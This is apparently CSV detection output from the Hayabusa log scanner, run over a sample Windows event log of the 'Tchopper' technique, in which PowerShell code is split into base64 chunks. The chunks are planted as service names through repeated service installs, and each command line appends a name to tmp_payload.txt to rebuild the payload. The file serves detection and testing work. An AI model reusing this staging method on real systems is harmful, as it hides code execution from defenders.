2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
